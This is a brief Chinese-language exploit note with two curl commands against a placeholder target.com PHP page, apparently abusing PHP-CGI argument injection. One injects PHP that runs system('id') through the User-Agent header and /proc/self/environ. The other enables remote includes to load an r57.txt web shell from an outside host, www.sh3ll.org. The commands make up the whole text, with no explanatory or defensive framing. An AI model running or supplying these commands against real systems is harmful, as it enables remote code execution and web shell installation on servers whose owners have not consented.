1、本地包含直接执行代码:
curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n
2、远程包含执行代码:
curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.sh3ll.org/r57.txt
